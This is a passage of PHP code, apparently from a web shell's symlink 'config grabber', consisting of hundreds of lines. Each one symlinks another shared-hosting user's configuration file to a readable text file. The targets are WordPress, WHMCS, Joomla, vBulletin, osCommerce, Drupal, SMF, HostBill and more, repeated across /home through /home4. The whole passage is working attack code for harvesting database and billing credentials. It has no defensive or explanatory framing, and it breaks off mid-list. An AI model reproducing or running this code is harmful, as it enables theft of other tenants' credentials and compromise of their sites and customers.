  572.             @symlink('/home/' . $user . '/public_html/' . $user . '/configuration.php', $user . '-USERNAME-WHMCS.txt');
  573.             @symlink('/home/' . $user . '/public_html/bill/configuration.php', $user . '-bill-WHMCS.txt');
  574.             @symlink('/home/' . $user . '/public_html/payment/configuration.php', $user . '-payment-WHMCS.txt');
  575.             @symlink('/home/' . $user . '/public_html/pay/configuration.php', $user . '-pay-WHMCS.txt');
  576.             @symlink('/home/' . $user . '/public_html/purchase/configuration.php', $user . '-purchase-WHMCS.txt');
  577.             @symlink('/home/' . $user . '/public_html/clientarea/configuration.php', $user . '-clientarea-WHMCS.txt');
  578.             @symlink('/home/' . $user . '/public_html/autobuy/configuration.php', $user . '-autobuy-WHMCS.txt');
  579.             @symlink('/home2/' . $user . '/public_html/includes/configure.php', $user . '-shop.txt');
  580.             @symlink('/home2/' . $user . '/public_html/os/includes/configure.php', $user . '-shop-os.txt');
  581.             @symlink('/home2/' . $user . '/public_html/oscom/includes/configure.php', $user . '-oscom.txt');
  582.             @symlink('/home2/' . $user . '/public_html/oscommerce/includes/configure.php', $user . '-oscommerce.txt');
  583.             @symlink('/home2/' . $user . '/public_html/oscommerces/includes/configure.php', $user . '-oscommerces.txt');
  584.             @symlink('/home2/' . $user . '/public_html/shop/includes/configure.php', $user . '-shop2.txt');
  585.             @symlink('/home2/' . $user . '/public_html/shopping/includes/configure.php', $user . '-shop-shopping.txt');
  586.             @symlink('/home2/' . $user . '/public_html/sale/includes/configure.php', $user . '-sale.txt');
  587.             @symlink('/home2/' . $user . '/public_html/amember/config.inc.php', $user . '-amember.txt');
  588.             @symlink('/home2/' . $user . '/public_html/config.inc.php', $user . '-amember2.txt');
  589.             @symlink('/home2/' . $user . '/public_html/members/configuration.php', $user . '-members.txt');
  590.             @symlink('/home2/' . $user . '/public_html/config.php', $user . '-4images1.txt');
  591.             @symlink('/home2/' . $user . '/public_html/forum/includes/config.php', $user . '-forum.txt');
  592.             @symlink('/home2/' . $user . '/public_html/forums/includes/config.php', $user . '-forums.txt');
  593.             @symlink('/home2/' . $user . '/public_html/admin/conf.php', $user . '-5.txt');
  594.             @symlink('/home2/' . $user . '/public_html/admin/config.php', $user . '-4.txt');
  595.             @symlink('/home2/' . $user . '/public_html/wp-config.php', $user . '-wp13.txt');
  596.             @symlink('/home2/' . $user . '/public_html/wp/wp-config.php', $user . '-wp13-wp.txt');
  597.             @symlink('/home2/' . $user . '/public_html/WP/wp-config.php', $user . '-wp13-WP.txt');
  598.             @symlink('/home2/' . $user . '/public_html/wp/beta/wp-config.php', $user . '-wp13-wp-beta.txt');
  599.             @symlink('/home2/' . $user . '/public_html/beta/wp-config.php', $user . '-wp13-beta.txt');
  600.             @symlink('/home2/' . $user . '/public_html/press/wp-config.php', $user . '-wp13-press.txt');
  601.             @symlink('/home2/' . $user . '/public_html/wordpress/wp-config.php', $user . '-wp13-wordpress.txt');
  602.             @symlink('/home2/' . $user . '/public_html/Wordpress/wp-config.php', $user . '-wp13-Wordpress.txt');
  603.             @symlink('/home2/' . $user . '/public_html/blog/wp-config.php', $user . '-wp13-Wordpress.txt');
  604.             @symlink('/home2/' . $user . '/public_html/wordpress/beta/wp-config.php', $user . '-wp13-wordpress-beta.txt');
  605.             @symlink('/home2/' . $user . '/public_html/news/wp-config.php', $user . '-wp13-news.txt');
  606.             @symlink('/home2/' . $user . '/public_html/new/wp-config.php', $user . '-wp13-new.txt');
  607.             @symlink('/home2/' . $user . '/public_html/blog/wp-config.php', $user . '-wp-blog.txt');
  608.             @symlink('/home2/' . $user . '/public_html/beta/wp-config.php', $user . '-wp-beta.txt');
  609.             @symlink('/home2/' . $user . '/public_html/blogs/wp-config.php', $user . '-wp-blogs.txt');
  610.             @symlink('/home2/' . $user . '/public_html/home2/wp-config.php', $user . '-wp-home2.txt');
  611.             @symlink('/home2/' . $user . '/public_html/protal/wp-config.php', $user . '-wp-protal.txt');
  612.             @symlink('/home2/' . $user . '/public_html/site/wp-config.php', $user . '-wp-site.txt');
  613.             @symlink('/home2/' . $user . '/public_html/main/wp-config.php', $user . '-wp-main.txt');
  614.             @symlink('/home2/' . $user . '/public_html/test/wp-config.php', $user . '-wp-test.txt');
  615.             @symlink('/home2/' . $user . '/public_html/arcade/functions/dbclass.php', $user . '-ibproarcade.txt');
  616.             @symlink('/home2/' . $user . '/public_html/arcade/functions/dbclass.php', $user . '-ibproarcade.txt');
  617.             @symlink('/home2/' . $user . '/public_html/joomla/configuration.php', $user . '-joomla2.txt');
  618.             @symlink('/home2/' . $user . '/public_html/protal/configuration.php', $user . '-joomla-protal.txt');
  619.             @symlink('/home2/' . $user . '/public_html/joo/configuration.php', $user . '-joo.txt');
  620.             @symlink('/home2/' . $user . '/public_html/cms/configuration.php', $user . '-joomla-cms.txt');
  621.             @symlink('/home2/' . $user . '/public_html/site/configuration.php', $user . '-joomla-site.txt');
  622.             @symlink('/home2/' . $user . '/public_html/main/configuration.php', $user . '-joomla-main.txt');
  623.             @symlink('/home2/' . $user . '/public_html/news/configuration.php', $user . '-joomla-news.txt');
  624.             @symlink('/home2/' . $user . '/public_html/new/configuration.php', $user . '-joomla-new.txt');
  625.             @symlink('/home2/' . $user . '/public_html/home2/configuration.php', $user . '-joomla-home2.txt');
  626.             @symlink('/home2/' . $user . '/public_html/vb/includes/config.php', $user . '-vb-config.txt');
  627.             @symlink('/home2/' . $user . '/public_html/vb3/includes/config.php', $user . '-vb3-config.txt');
  628.             @symlink('/home2/' . $user . '/public_html/cc/includes/config.php', $user . '-vb1-config.txt');
  629.             @symlink('/home2/' . $user . '/public_html/includes/config.php', $user . '-includes-vb.txt');
  630.             @symlink('/home2/' . $user . '/public_html/forum/includes/class_core.php', $user . '-vbluttin-class_core.php.txt');
  631.             @symlink('/home2/' . $user . '/public_html/vb/includes/class_core.php', $user . '-vbluttin-class_core.php1.txt');
  632.             @symlink('/home2/' . $user . '/public_html/cc/includes/class_core.php', $user . '-vbluttin-class_core.php2.txt');
  633.             @symlink('/home2/' . $user . '/public_html/configuration.php', $user . '-joomla.txt');
  634.             @symlink('/home2/' . $user . '/public_html/includes/dist-configure.php', $user . '-zencart.txt');
  635.             @symlink('/home2/' . $user . '/public_html/zencart/includes/dist-configure.php', $user . '-shop-zencart.txt');
  636.             @symlink('/home2/' . $user . '/public_html/shop/includes/dist-configure.php', $user . '-shop-ZCshop.txt');
  637.             @symlink('/home2/' . $user . '/public_html/Settings.php', $user . '-smf.txt');
  638.             @symlink('/home2/' . $user . '/public_html/smf/Settings.php', $user . '-smf2.txt');
  639.             @symlink('/home2/' . $user . '/public_html/forum/Settings.php', $user . '-smf-forum.txt');
  640.             @symlink('/home2/' . $user . '/public_html/forums/Settings.php', $user . '-smf-forums.txt');
  641.             @symlink('/home2/' . $user . '/public_html/upload/includes/config.php', $user . '-up.txt');
  642.             @symlink('/home2/' . $user . '/public_html/article/config.php', $user . '-Nwahy.txt');
  643.             @symlink('/home2/' . $user . '/public_html/up/includes/config.php', $user . '-up2.txt');
  644.             @symlink('/home2/' . $user . '/public_html/conf_global.php', $user . '-6.txt');
  645.             @symlink('/home2/' . $user . '/public_html/include/db.php', $user . '-7.txt');
  646.             @symlink('/home2/' . $user . '/public_html/connect.php', $user . '-PHP-Fusion.txt');
  647.             @symlink('/home2/' . $user . '/public_html/mk_conf.php', $user . '-9.txt');
  648.             @symlink('/home2/' . $user . '/public_html/includes/config.php', $user . '-traidnt1.txt');
  649.             @symlink('/home2/' . $user . '/public_html/config.php', $user . '-4images.txt');
  650.             @symlink('/home2/' . $user . '/public_html/sites/default/settings.php', $user . '-Drupal.txt');
  651.             @symlink('/home2/' . $user . '/public_html/member/configuration.php', $user . '-1member.txt');
  652.             @symlink('/home2/' . $user . '/public_html/supports/includes/iso4217.php', $user . '-hostbills-supports.txt');
  653.             @symlink('/home2/' . $user . '/public_html/client/includes/iso4217.php', $user . '-hostbills-client.txt');
  654.             @symlink('/home2/' . $user . '/public_html/support/includes/iso4217.php', $user . '-hostbills-support.txt');
  655.             @symlink('/home2/' . $user . '/public_html/billing/includes/iso4217.php', $user . '-hostbills-billing.txt');
  656.             @symlink('/home2/' . $user . '/public_html/billings/includes/iso4217.php', $user . '-hostbills-billings.txt');
  657.             @symlink('/home2/' . $user . '/public_html/host/includes/iso4217.php', $user . '-hostbills-host.txt');
  658.             @symlink('/home2/' . $user . '/public_html/hosts/includes/iso4217.php', $user . '-hostbills-hosts.txt');
  659.             @symlink('/home2/' . $user . '/public_html/hosting/includes/iso4217.php', $user . '-hostbills-hosting.txt');
  660.             @symlink('/home2/' . $user . '/public_html/hostings/includes/iso4217.php', $user . '-hostbills-hostings.txt');
  661.             @symlink('/home2/' . $user . '/public_html/includes/iso4217.php', $user . '-hostbills.txt');
  662.             @symlink('/home2/' . $user . '/public_html/hostbills/includes/iso4217.php', $user . '-hostbills-hostbills.txt');
  663.             @symlink('/home2/' . $user . '/public_html/hostbill/includes/iso4217.php', $user . '-hostbills-hostbill.txt');
  664.             @symlink('/home2/' . $user . '/public_html/cart/configuration.php', $user . '-cart-WHMCS.txt');
  665.             @symlink('/home2/' . $user . '/public_html/hosting/configuration.php', $user . '-hosting-WHMCS.txt');
  666.             @symlink('/home2/' . $user . '/public_html/buy/configuration.php', $user . '-buy-WHMCS.txt');
  667.             @symlink('/home2/' . $user . '/public_html/checkout/configuration.php', $user . '-checkout-WHMCS.txt');
  668.             @symlink('/home2/' . $user . '/public_html/host/configuration.php', $user . '-host-WHMCS.txt');
  669.             @symlink('/home2/' . $user . '/public_html/shop/configuration.php', $user . '-shop-WHMCS.txt');
  670.             @symlink('/home2/' . $user . '/public_html/shopping/configuration.php', $user . '-shopping-WHMCS.txt');
  671.             @symlink('/home2/' . $user . '/public_html/sale/configuration.php', $user . '-sale-WHMCS.txt');
  672.             @symlink('/home2/' . $user . '/public_html/client/configuration.php', $user . '-client-WHMCS.txt');
  673.             @symlink('/home2/' . $user . '/public_html/support/configuration.php', $user . '-support-WHMCS.txt');
  674.             @symlink('/home2/' . $user . '/public_html/clientsupport/configuration.php', $user . '-clientsupport-WHMCS.txt');
  675.             @symlink('/home2/' . $user . '/public_html/whm/whmcs/configuration.php', $user . '-whm-whmcs.txt');
  676.             @symlink('/home2/' . $user . '/public_html/whm/WHMCS/configuration.php', $user . '-whm-WHMCS.txt');
  677.             @symlink('/home2/' . $user . '/public_html/whmc/WHM/configuration.php', $user . '-whmc-WHM.txt');
  678.             @symlink('/home2/' . $user . '/public_html/whmcs/configuration.php', $user . '-whmc-WHMCS.txt');
  679.             @symlink('/home2/' . $user . '/public_html/supp/configuration.php', $user . '-supp-WHMCS.txt');
  680.             @symlink('/home2/' . $user . '/public_html/secure/configuration.php', $user . '-sucure-WHMCS.txt');
  681.             @symlink('/home2/' . $user . '/public_html/secure/whm/configuration.php', $user . '-sucure-whm-WHMCS.txt');
  682.             @symlink('/home2/' . $user . '/public_html/secure/whmcs/configuration.php', $user . '-sucure-whmcs-WHMCS.txt');
  683.             @symlink('/home2/' . $user . '/public_html/panel/configuration.php', $user . '-panel-WHMCS.txt');
  684.             @symlink('/home2/' . $user . '/public_html/hosts/configuration.php', $user . '-hosts-WHMCS.txt');
  685.             @symlink('/home2/' . $user . '/public_html/submitticket.php', $user . '-submitticket-WHMCS.txt');
  686.             @symlink('/home2/' . $user . '/public_html/clients/configuration.php', $user . '-clients-WHMCS.txt');
  687.             @symlink('/home2/' . $user . '/public_html/clientes/configuration.php', $user . '-clientes-WHMCS.txt');
  688.             @symlink('/home2/' . $user . '/public_html/cliente/configuration.php', $user . '-client-WHMCS.txt');
  689.             @symlink('/home2/' . $user . '/public_html/billing/configuration.php', $user . '-billing-WHMCS.txt');
  690.             @symlink('/home2/' . $user . '/public_html/manage/configuration.php', $user . '-whm-manage-WHMCS.txt');
  691.             @symlink('/home2/' . $user . '/public_html/my/configuration.php', $user . '-whm-my-WHMCS.txt');
  692.             @symlink('/home2/' . $user . '/public_html/myshop/configuration.php', $user . '-whm-myshop-WHMCS.txt');
  693.             @symlink('/home2/' . $user . '/public_html/billings/configuration.php', $user . '-billings-WHMCS.txt');
  694.             @symlink('/home2/' . $user . '/public_html/supports/configuration.php', $user . '-supports-WHMCS.txt');
  695.             @symlink('/home2/' . $user . '/public_html/auto/configuration.php', $user . '-auto-WHMCS.txt');
  696.             @symlink('/home2/' . $user . '/public_html/go/configuration.php', $user . '-go-WHMCS.txt');
  697.             @symlink('/home2/' . $user . '/public_html/' . $user . '/configuration.php', $user . '-USERNAME-WHMCS.txt');
  698.             @symlink('/home2/' . $user . '/public_html/bill/configuration.php', $user . '-bill-WHMCS.txt');
  699.             @symlink('/home2/' . $user . '/public_html/payment/configuration.php', $user . '-payment-WHMCS.txt');
  700.             @symlink('/home2/' . $user . '/public_html/pay/configuration.php', $user . '-pay-WHMCS.txt');
  701.             @symlink('/home2/' . $user . '/public_html/purchase/configuration.php', $user . '-purchase-WHMCS.txt');
  702.             @symlink('/home2/' . $user . '/public_html/clientarea/configuration.php', $user . '-clientarea-WHMCS.txt');
  703.             @symlink('/home2/' . $user . '/public_html/autobuy/configuration.php', $user . '-autobuy-WHMCS.txt');
  704.             @symlink('/home3/' . $user . '/public_html/includes/configure.php', $user . '-shop.txt');
  705.             @symlink('/home3/' . $user . '/public_html/os/includes/configure.php', $user . '-shop-os.txt');
  706.             @symlink('/home3/' . $user . '/public_html/oscom/includes/configure.php', $user . '-oscom.txt');
  707.             @symlink('/home3/' . $user . '/public_html/oscommerce/includes/configure.php', $user . '-oscommerce.txt');
  708.             @symlink('/home3/' . $user . '/public_html/oscommerces/includes/configure.php', $user . '-oscommerces.txt');
  709.             @symlink('/home3/' . $user . '/public_html/shop/includes/configure.php', $user . '-shop2.txt');
  710.             @symlink('/home3/' . $user . '/public_html/shopping/includes/configure.php', $user . '-shop-shopping.txt');
  711.             @symlink('/home3/' . $user . '/public_html/sale/includes/configure.php', $user . '-sale.txt');
  712.             @symlink('/home3/' . $user . '/public_html/amember/config.inc.php', $user . '-amember.txt');
  713.             @symlink('/home3/' . $user . '/public_html/config.inc.php', $user . '-amember2.txt');
  714.             @symlink('/home3/' . $user . '/public_html/members/configuration.php', $user . '-members.txt');
  715.             @symlink('/home3/' . $user . '/public_html/config.php', $user . '-4images1.txt');
  716.             @symlink('/home3/' . $user . '/public_html/forum/includes/config.php', $user . '-forum.txt');
  717.             @symlink('/home3/' . $user . '/public_html/forums/includes/config.php', $user . '-forums.txt');
  718.             @symlink('/home3/' . $user . '/public_html/admin/conf.php', $user . '-5.txt');
  719.             @symlink('/home3/' . $user . '/public_html/admin/config.php', $user . '-4.txt');
  720.             @symlink('/home3/' . $user . '/public_html/wp-config.php', $user . '-wp13.txt');
  721.             @symlink('/home3/' . $user . '/public_html/wp/wp-config.php', $user . '-wp13-wp.txt');
  722.             @symlink('/home3/' . $user . '/public_html/WP/wp-config.php', $user . '-wp13-WP.txt');
  723.             @symlink('/home3/' . $user . '/public_html/wp/beta/wp-config.php', $user . '-wp13-wp-beta.txt');
  724.             @symlink('/home3/' . $user . '/public_html/beta/wp-config.php', $user . '-wp13-beta.txt');
  725.             @symlink('/home3/' . $user . '/public_html/press/wp-config.php', $user . '-wp13-press.txt');
  726.             @symlink('/home3/' . $user . '/public_html/wordpress/wp-config.php', $user . '-wp13-wordpress.txt');
  727.             @symlink('/home3/' . $user . '/public_html/Wordpress/wp-config.php', $user . '-wp13-Wordpress.txt');
  728.             @symlink('/home3/' . $user . '/public_html/blog/wp-config.php', $user . '-wp13-Wordpress.txt');
  729.             @symlink('/home3/' . $user . '/public_html/wordpress/beta/wp-config.php', $user . '-wp13-wordpress-beta.txt');
  730.             @symlink('/home3/' . $user . '/public_html/news/wp-config.php', $user . '-wp13-news.txt');
  731.             @symlink('/home3/' . $user . '/public_html/new/wp-config.php', $user . '-wp13-new.txt');
  732.             @symlink('/home3/' . $user . '/public_html/blog/wp-config.php', $user . '-wp-blog.txt');
  733.             @symlink('/home3/' . $user . '/public_html/beta/wp-config.php', $user . '-wp-beta.txt');
  734.             @symlink('/home3/' . $user . '/public_html/blogs/wp-config.php', $user . '-wp-blogs.txt');
  735.             @symlink('/home3/' . $user . '/public_html/home3/wp-config.php', $user . '-wp-home3.txt');
  736.             @symlink('/home3/' . $user . '/public_html/protal/wp-config.php', $user . '-wp-protal.txt');
  737.             @symlink('/home3/' . $user . '/public_html/site/wp-config.php', $user . '-wp-site.txt');
  738.             @symlink('/home3/' . $user . '/public_html/main/wp-config.php', $user . '-wp-main.txt');
  739.             @symlink('/home3/' . $user . '/public_html/test/wp-config.php', $user . '-wp-test.txt');
  740.             @symlink('/home3/' . $user . '/public_html/arcade/functions/dbclass.php', $user . '-ibproarcade.txt');
  741.             @symlink('/home3/' . $user . '/public_html/arcade/functions/dbclass.php', $user . '-ibproarcade.txt');
  742.             @symlink('/home3/' . $user . '/public_html/joomla/configuration.php', $user . '-joomla2.txt');
  743.             @symlink('/home3/' . $user . '/public_html/protal/configuration.php', $user . '-joomla-protal.txt');
  744.             @symlink('/home3/' . $user . '/public_html/joo/configuration.php', $user . '-joo.txt');
  745.             @symlink('/home3/' . $user . '/public_html/cms/configuration.php', $user . '-joomla-cms.txt');
  746.             @symlink('/home3/' . $user . '/public_html/site/configuration.php', $user . '-joomla-site.txt');
  747.             @symlink('/home3/' . $user . '/public_html/main/configuration.php', $user . '-joomla-main.txt');
  748.             @symlink('/home3/' . $user . '/public_html/news/configuration.php', $user . '-joomla-news.txt');
  749.             @symlink('/home3/' . $user . '/public_html/new/configuration.php', $user . '-joomla-new.txt');
  750.             @symlink('/home3/' . $user . '/public_html/home3/configuration.php', $user . '-joomla-home3.txt');
  751.             @symlink('/home3/' . $user . '/public_html/vb/includes/config.php', $user . '-vb-config.txt');
  752.             @symlink('/home3/' . $user . '/public_html/vb3/includes/config.php', $user . '-vb3-config.txt');
  753.             @symlink('/home3/' . $user . '/public_html/cc/includes/config.php', $user . '-vb1-config.txt');
  754.             @symlink('/home3/' . $user . '/public_html/includes/config.php', $user . '-includes-vb.txt');
  755.             @symlink('/home3/' . $user . '/public_html/forum/includes/class_core.php', $user . '-vbluttin-class_core.php.txt');
  756.             @symlink('/home3/' . $user . '/public_html/vb/includes/class_core.php', $user . '-vbluttin-class_core.php1.txt');
  757.             @symlink('/home3/' . $user . '/public_html/cc/includes/class_core.php', $user . '-vbluttin-class_core.php2.txt');
  758.             @symlink('/home3/' . $user . '/public_html/configuration.php', $user . '-joomla.txt');
  759.             @symlink('/home3/' . $user . '/public_html/includes/dist-configure.php', $user . '-zencart.txt');
  760.             @symlink('/home3/' . $user . '/public_html/zencart/includes/dist-configure.php', $user . '-shop-zencart.txt');
  761.             @symlink('/home3/' . $user . '/public_html/shop/includes/dist-configure.php', $user . '-shop-ZCshop.txt');
  762.             @symlink('/home3/' . $user . '/public_html/Settings.php', $user . '-smf.txt');
  763.             @symlink('/home3/' . $user . '/public_html/smf/Settings.php', $user . '-smf2.txt');
  764.             @symlink('/home3/' . $user . '/public_html/forum/Settings.php', $user . '-smf-forum.txt');
  765.             @symlink('/home3/' . $user . '/public_html/forums/Settings.php', $user . '-smf-forums.txt');
  766.             @symlink('/home3/' . $user . '/public_html/upload/includes/config.php', $user . '-up.txt');
  767.             @symlink('/home3/' . $user . '/public_html/article/config.php', $user . '-Nwahy.txt');
  768.             @symlink('/home3/' . $user . '/public_html/up/includes/config.php', $user . '-up2.txt');
  769.             @symlink('/home3/' . $user . '/public_html/conf_global.php', $user . '-6.txt');
  770.             @symlink('/home3/' . $user . '/public_html/include/db.php', $user . '-7.txt');
  771.             @symlink('/home3/' . $user . '/public_html/connect.php', $user . '-PHP-Fusion.txt');
  772.             @symlink('/home3/' . $user . '/public_html/mk_conf.php', $user . '-9.txt');
  773.             @symlink('/home3/' . $user . '/public_html/includes/config.php', $user . '-traidnt1.txt');
  774.             @symlink('/home3/' . $user . '/public_html/config.php', $user . '-4images.txt');
  775.             @symlink('/home3/' . $user . '/public_html/sites/default/settings.php', $user . '-Drupal.txt');
  776.             @symlink('/home3/' . $user . '/public_html/member/configuration.php', $user . '-1member.txt');
  777.             @symlink('/home3/' . $user . '/public_html/supports/includes/iso4217.php', $user . '-hostbills-supports.txt');
  778.             @symlink('/home3/' . $user . '/public_html/client/includes/iso4217.php', $user . '-hostbills-client.txt');
  779.             @symlink('/home3/' . $user . '/public_html/support/includes/iso4217.php', $user . '-hostbills-support.txt');
  780.             @symlink('/home3/' . $user . '/public_html/billing/includes/iso4217.php', $user . '-hostbills-billing.txt');
  781.             @symlink('/home3/' . $user . '/public_html/billings/includes/iso4217.php', $user . '-hostbills-billings.txt');
  782.             @symlink('/home3/' . $user . '/public_html/host/includes/iso4217.php', $user . '-hostbills-host.txt');
  783.             @symlink('/home3/' . $user . '/public_html/hosts/includes/iso4217.php', $user . '-hostbills-hosts.txt');
  784.             @symlink('/home3/' . $user . '/public_html/hosting/includes/iso4217.php', $user . '-hostbills-hosting.txt');
  785.             @symlink('/home3/' . $user . '/public_html/hostings/includes/iso4217.php', $user . '-hostbills-hostings.txt');
  786.             @symlink('/home3/' . $user . '/public_html/includes/iso4217.php', $user . '-hostbills.txt');
  787.             @symlink('/home3/' . $user . '/public_html/hostbills/includes/iso4217.php', $user . '-hostbills-hostbills.txt');
  788.             @symlink('/home3/' . $user . '/public_html/hostbill/includes/iso4217.php', $user . '-hostbills-hostbill.txt');
  789.             @symlink('/home3/' . $user . '/public_html/cart/configuration.php', $user . '-cart-WHMCS.txt');
  790.             @symlink('/home3/' . $user . '/public_html/hosting/configuration.php', $user . '-hosting-WHMCS.txt');
  791.             @symlink('/home3/' . $user . '/public_html/buy/configuration.php', $user . '-buy-WHMCS.txt');
  792.             @symlink('/home3/' . $user . '/public_html/checkout/configuration.php', $user . '-checkout-WHMCS.txt');
  793.             @symlink('/home3/' . $user . '/public_html/host/configuration.php', $user . '-host-WHMCS.txt');
  794.             @symlink('/home3/' . $user . '/public_html/shop/configuration.php', $user . '-shop-WHMCS.txt');
  795.             @symlink('/home3/' . $user . '/public_html/shopping/configuration.php', $user . '-shopping-WHMCS.txt');
  796.             @symlink('/home3/' . $user . '/public_html/sale/configuration.php', $user . '-sale-WHMCS.txt');
  797.             @symlink('/home3/' . $user . '/public_html/client/configuration.php', $user . '-client-WHMCS.txt');
  798.             @symlink('/home3/' . $user . '/public_html/support/configuration.php', $user . '-support-WHMCS.txt');
  799.             @symlink('/home3/' . $user . '/public_html/clientsupport/configuration.php', $user . '-clientsupport-WHMCS.txt');
  800.             @symlink('/home3/' . $user . '/public_html/whm/whmcs/configuration.php', $user . '-whm-whmcs.txt');
  801.             @symlink('/home3/' . $user . '/public_html/whm/WHMCS/configuration.php', $user . '-whm-WHMCS.txt');
  802.             @symlink('/home3/' . $user . '/public_html/whmc/WHM/configuration.php', $user . '-whmc-WHM.txt');
  803.             @symlink('/home3/' . $user . '/public_html/whmcs/configuration.php', $user . '-whmc-WHMCS.txt');
  804.             @symlink('/home3/' . $user . '/public_html/supp/configuration.php', $user . '-supp-WHMCS.txt');
  805.             @symlink('/home3/' . $user . '/public_html/secure/configuration.php', $user . '-sucure-WHMCS.txt');
  806.             @symlink('/home3/' . $user . '/public_html/secure/whm/configuration.php', $user . '-sucure-whm-WHMCS.txt');
  807.             @symlink('/home3/' . $user . '/public_html/secure/whmcs/configuration.php', $user . '-sucure-whmcs-WHMCS.txt');
  808.             @symlink('/home3/' . $user . '/public_html/panel/configuration.php', $user . '-panel-WHMCS.txt');
  809.             @symlink('/home3/' . $user . '/public_html/hosts/configuration.php', $user . '-hosts-WHMCS.txt');
  810.             @symlink('/home3/' . $user . '/public_html/submitticket.php', $user . '-submitticket-WHMCS.txt');
  811.             @symlink('/home3/' . $user . '/public_html/clients/configuration.php', $user . '-clients-WHMCS.txt');
  812.             @symlink('/home3/' . $user . '/public_html/clientes/configuration.php', $user . '-clientes-WHMCS.txt');
  813.             @symlink('/home3/' . $user . '/public_html/cliente/configuration.php', $user . '-client-WHMCS.txt');
  814.             @symlink('/home3/' . $user . '/public_html/billing/configuration.php', $user . '-billing-WHMCS.txt');
  815.             @symlink('/home3/' . $user . '/public_html/manage/configuration.php', $user . '-whm-manage-WHMCS.txt');
  816.             @symlink('/home3/' . $user . '/public_html/my/configuration.php', $user . '-whm-my-WHMCS.txt');
  817.             @symlink('/home3/' . $user . '/public_html/myshop/configuration.php', $user . '-whm-myshop-WHMCS.txt');
  818.             @symlink('/home3/' . $user . '/public_html/billings/configuration.php', $user . '-billings-WHMCS.txt');
  819.             @symlink('/home3/' . $user . '/public_html/supports/configuration.php', $user . '-supports-WHMCS.txt');
  820.             @symlink('/home3/' . $user . '/public_html/auto/configuration.php', $user . '-auto-WHMCS.txt');
  821.             @symlink('/home3/' . $user . '/public_html/go/configuration.php', $user . '-go-WHMCS.txt');
  822.             @symlink('/home3/' . $user . '/public_html/' . $user . '/configuration.php', $user . '-USERNAME-WHMCS.txt');
  823.             @symlink('/home3/' . $user . '/public_html/bill/configuration.php', $user . '-bill-WHMCS.txt');
  824.             @symlink('/home3/' . $user . '/public_html/payment/configuration.php', $user . '-payment-WHMCS.txt');
  825.             @symlink('/home3/' . $user . '/public_html/pay/configuration.php', $user . '-pay-WHMCS.txt');
  826.             @symlink('/home3/' . $user . '/public_html/purchase/configuration.php', $user . '-purchase-WHMCS.txt');
  827.             @symlink('/home3/' . $user . '/public_html/clientarea/configuration.php', $user . '-clientarea-WHMCS.txt');
  828.             @symlink('/home3/' . $user . '/public_html/autobuy/configuration.php', $user . '-autobuy-WHMCS.txt');
  829.             @symlink('/home4/' . $user . '/public_html/includes/configure.php', $user . '-shop.txt');
  830.             @symlink('/home4/' . $user . '/public_html/os/includes/configure.php', $user . '-shop-os.txt');
  831.             @symlink('/home4/' . $user . '/public_html/oscom/includes/configure.php', $user . '-oscom.txt');
  832.             @symlink('/home4/' . $user . '/public_html/oscommerce/includes/configure.php', $user . '-oscommerce.txt');
  833.             @symlink('/home4/' . $user . '/public_html/oscommerces/includes/configure.php', $user . '-oscommerces.txt');
  834.             @symlink('/home4/' . $user . '/public_html/shop/includes/configure.php', $user . '-shop2.txt');
  835.             @symlink('/home4/' . $user . '/public_html/shopping/includes/configure.php', $user . '-shop-shopping.txt');
  836.             @symlink('/home4/' . $user . '/public_html/sale/includes/configure.php', $user . '-sale.txt');
  837.             @symlink('/home4/' . $user . '/public_html/amember/config.inc.php', $user . '-amember.txt');
  838.             @symlink('/home4/' . $user . '/public_html/config.inc.php', $user . '-amember2.txt');
  839.             @symlink('/home4/' . $user . '/public_html/members/configuration.php', $user . '-members.txt');
  840.             @symlink('/home4/' . $user . '/public_html/config.php', $user . '-4images1.txt');
  841.             @symlink('/home4/' . $user . '/public_html/forum/includes/config.php', $user . '-forum.txt');
  842.             @symlink('/home4/' . $user . '/public_html/forums/includes/config.php', $user . '-forums.txt');
  843.             @symlink('/home4/' . $user . '/public_html/admin/conf.php', $user . '-5.txt');
  844.             @symlink('/home4/' . $user . '/public_html/admin/config.php', $user . '-4.txt');
  845.             @symlink('/home4/' . $user . '/public_html/wp-config.php', $user . '-wp13.txt');
  846.             @symlink('/home4/' . $user . '/public_html/wp/wp-config.php', $user . '-wp13-wp.txt');
  847.             @symlink('/home4/' . $user . '/public_html/WP/wp-config.php', $user . '-wp13-WP.txt');
  848.             @symlink('/home4/' . $user . '/public_html/wp/beta/wp-config.php', $user . '-wp13-wp-beta.txt');
  849.             @symlink('/home4/' . $user . '/public_html/beta/wp-config.php', $user . '-wp13-beta.txt');
  850.             @symlink('/home4/' . $user . '/public_html/press/wp-config.php', $user . '-wp13-press.txt');
  851.             @symlink('/home4/' . $user . '/public_html/wordpress/wp-config.php', $user . '-wp13-wordpress.txt');
  852.             @symlink('/home4/' . $user . '/public_html/Wordpress/wp-config.php', $user . '-wp13-Wordpress.txt');
  853.             @symlink('/home4/' . $user . '/public_html/blog/wp-config.php', $user . '-wp13-Wordpress.txt');
  854.             @symlink('/home4/' . $user . '/public_html/wordpress/beta/wp-config.php', $user . '-wp13-wordpress-beta.txt');
  855.             @symlink('/home4/' . $user . '/public_html/news/wp-config.php', $user . '-wp13-news.txt');
  856.             @symlink('/home4/' . $user . '/public_html/new/wp-config.php', $user . '-wp13-new.txt');
  857.             @symlink('/home4/' . $user . '/public_html/blog/wp-config.php', $user . '-wp-blog.txt');
  858.             @symlink('/home4/' . $user . '/public_html/beta/wp-config.php', $user . '-wp-beta.txt');
  859.             @symlink('/home4/' . $user . '/public_html/blogs/wp-config.php', $user . '-wp-blogs.txt');
  860.             @symlink('/home4/' . $user . '/public_html/home4/wp-config.php', $user . '-wp-home4.txt');
  861.             @symlink('/home4/' . $user . '/public_html/protal/wp-config.php', $user . '-wp-protal.txt');
  862.             @symlink('/home4/' . $user . '/public_html/site/wp-config.php', $user . '-wp-site.txt');
  863.             @symlink('/home4/' . $user . '/public_html/main/wp-config.php', $user . '-wp-main.txt');
  864.             @symlink('/home4/' . $user . '/public_html/test/wp-config.php', $user . '-wp-test.txt');
  865.             @symlink('/home4/' . $user . '/public_html/arcade/functions/dbclass.php', $user . '-ibproarcade.txt');
  866.             @symlink('/home4/' . $user . '/public_html/arcade/functions/dbclass.php', $user . '-ibproarcade.txt');
  867.             @symlink('/home4/' . $user . '/public_html/joomla/configuration.php', $user . '-joomla2.txt');
  868.             @symlink('/home4/' . $user . '/public_html/protal/configuration.php', $user . '-joomla-protal.txt');
  869.             @symlink('/home4/' . $user . '/public_html/joo/configuration.php', $user . '-joo.txt');
  870.             @symlink('/home4/' . $user . '/public_html/cms/configuration.php', $user . '-joomla-cms.txt');
